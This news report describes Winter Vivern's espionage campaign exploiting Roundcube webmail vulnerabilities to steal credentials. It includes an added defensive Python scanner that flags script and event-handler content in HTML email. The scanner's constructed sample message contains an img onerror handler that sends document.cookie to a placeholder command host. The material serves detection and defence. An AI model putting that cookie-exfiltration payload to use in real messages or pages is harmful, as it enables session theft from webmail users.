Cyber espionage activity attributed to a group with ties to Belarus and Russia, known as Winter Vivern (also tracked as TA473 and UAC0114), has been observed targeting more than 80 organizations by exploiting vulnerabilities in Roundcube webmail servers. The campaign, which primarily affected entities in Georgia, Poland, and Ukraine, was reported by Recorded Future, which tracks the group as Threat Activity Group 70 (TAG-70). The group's focus on exploiting flaws in email software matches the behavior of other Russia-aligned actors such as APT28, APT29, and Sandworm, as ESET had previously outlined in October 2023.
Winter Vivern has been active since at least December 2020 and is known for combining social engineering with the exploitation of software vulnerabilities. Notably, in July 2023 the group exploited a vulnerability in the Zimbra Collaboration email software to attack organizations in Moldova and Tunisia; that flaw has since been patched.
The most recent TAG-70 espionage effort, conducted from early to mid-October 2023, aimed to gather intelligence on European political and military activities and followed attacks on Uzbekistan government mail servers in March 2023. In these attacks, JavaScript payloads delivered through Roundcube vulnerabilities were used to exfiltrate user credentials to a command-and-control server.
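The attack chain above hinges on a webmail client rendering attacker-controlled script. The following is an added example, not code from the article, Recorded Future, or the Roundcube project: a mail-gateway check that flags active content (script elements, event-handler attributes, script-scheme URLs, embedded forms) in the HTML parts of a message before a webmail client gets to render it. It assumes the payload arrives as active HTML inside an email, which is the usual delivery path for webmail XSS; the two sample messages, the `c2.invalid` host, and the function names are constructed for this example.

```python
# Added example (not from the article or any vendor's code): flag active content in
# HTML e-mail parts before a webmail client renders them. Assumes the JavaScript payload
# arrives as script, event handlers or script-scheme URLs inside an HTML message; the
# sample messages below are constructed for this example.
import email
from email import policy
from html.parser import HTMLParser

# Elements that execute code, embed a nested document, or capture input when rendered.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "form"}
# URL schemes that run script or load a nested HTML document.
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


class ActiveContentScanner(HTMLParser):
    """Collects one finding per element or attribute that could run script in the client."""

    def __init__(self):
        super().__init__()
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag in ACTIVE_TAGS:
            self.findings.add(f"<{tag}> element")
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):  # onerror=, onload=, onmouseover=, ...
                self.findings.add(f"<{tag}> {name}= handler")
            if value is None:
                continue
            # Browsers ignore whitespace and case inside the scheme, so normalise first.
            normalised = "".join(value.split()).lower()
            if normalised.startswith(SCRIPT_SCHEMES):
                scheme = normalised.split(":", 1)[0]
                self.findings.add(f"<{tag}> {name}= uses {scheme}: scheme")

    # Self-closing tags such as <img ... /> go through the same check.
    handle_startendtag = handle_starttag


def scan_html(html):
    """Return the sorted list of findings for one HTML document."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return sorted(scanner.findings)


def scan_message(raw):
    """Parse an RFC 5322 message and scan every text/html part it contains."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = set()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.update(scan_html(part.get_content()))
    return sorted(findings)


# Constructed sample: a harmless HTML notification.
BENIGN = b"""From: alice@example.invalid
To: bob@example.invalid
Subject: agenda
Content-Type: text/html; charset=utf-8

<html><body><p>Meeting at <b>10:00</b>. <a href="https://example.invalid/doc">Agenda</a></p></body></html>
"""

# Constructed sample: active content that a sanitising webmail client must strip.
MALICIOUS = b"""From: sender@example.invalid
To: bob@example.invalid
Subject: invoice
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Please see the attached invoice.
--b1
Content-Type: text/html; charset=utf-8

<html><body>
<p>Please see the <a href="javascript:void(0)">invoice</a>.</p>
<img src="x" onerror="new Image().src='https://c2.invalid/?c='+document.cookie">
<svg><script>/* constructed placeholder, not a real payload */</script></svg>
</body></html>
--b1--
"""

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, scan_message(raw))
```

A check like this belongs at the gateway or in the webmail sanitiser's test suite, not in place of it: it catches the obvious delivery forms, but a parser-differential bug (the client and the scanner disagreeing on what is a tag) is exactly the kind of gap these campaigns rely on, so it complements, rather than replaces, keeping the webmail software patched.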
TAG-70's targeting has also extended to the Iranian embassies in Russia and the Netherlands and to the Georgian Embassy in Sweden, indicating a broader geopolitical interest in monitoring diplomatic and governmental activity related to Russia's war in Ukraine, as well as Georgia's ambitions to join the European Union (EU) and NATO.